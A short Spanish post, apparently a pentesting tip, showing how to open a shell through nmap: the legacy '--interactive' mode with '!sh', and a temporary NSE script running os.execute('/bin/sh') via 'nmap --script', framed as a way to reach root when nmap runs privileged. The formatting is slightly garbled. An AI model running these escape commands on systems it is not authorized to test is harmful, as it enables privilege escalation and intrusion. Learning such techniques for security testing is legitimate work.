Vamos a ver un truco (o dos) para abrir una shell usando nmap.
Nmap es una aplicación utilizada no solo por pentesters o hackers, sino también por administradores de sistemas, por lo que es fácil que nos la encontremos instalada, y además con privilegios de root, pero... ¿sabes que se puede abrir una shell usando nmap?
Si está instalada una versión antigua (hasta la 5.2) venía con un modo interactivo:#nmap --interactive
#!sh |
¿Y para versiones más actuales? Pues usamos nuestros conocimientos de bash, podemos crear un script como el siguiente:
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF |
Asignarle permisos y ejecutarlo:
Y listo, ya tenemos nuestra Shell, podemos hacer uso de herramientas no destinadas para ello para acceder a ficheros y explorar el sistema operativo objetivo.
Always Learning.